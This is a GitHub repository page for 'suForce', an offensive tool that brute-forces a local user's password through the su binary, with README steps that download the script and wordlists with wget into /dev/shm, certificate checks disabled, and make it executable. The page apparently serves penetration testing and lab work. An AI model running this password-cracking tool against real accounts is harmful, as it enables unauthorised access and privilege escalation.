Skip to content

d4t4s3c/suForce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

40 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

suForce

Obtains a user's password by abusing the su binary.

  • Download suForce
cd /dev/shm
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/main/suForce"
chmod +x suForce
  • Download Wordlist (Optional)
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/main/techyou.txt"
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/main/top12000.txt"
  • Usage
./suForce -u <USER> -w <WORDLIST>